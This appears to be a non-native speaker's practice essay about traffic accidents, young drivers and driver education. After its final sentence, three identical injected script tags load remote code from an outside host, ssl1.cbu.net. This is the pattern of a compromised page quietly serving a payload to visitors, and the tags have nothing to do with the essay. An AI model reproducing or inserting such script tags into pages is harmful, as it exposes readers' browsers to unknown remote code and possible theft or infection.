The best way to reduce the number of traffic accidents is to make all young drivers complete a safe driving education course before being licensed to drive.

Now a days the accidents are increasing day by day.so for awareness of traffic accidents all the drivers first should get licence.

The more traffic accidents are because of young drivers and not having the proper roads.As we are seeing that youth does not follow the traffic rules and the driving will be so rude.If the rain falls then the roads will be so damaged with full of water and manholes.For instance,two days back I saw one situation two members going on a bike with full speed and the traffic signal was owned they passed over the signal after going some distance they both fallen in a terrible situation and they were spot dead.

On the other hand,we should not give permission to drive the old mens.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>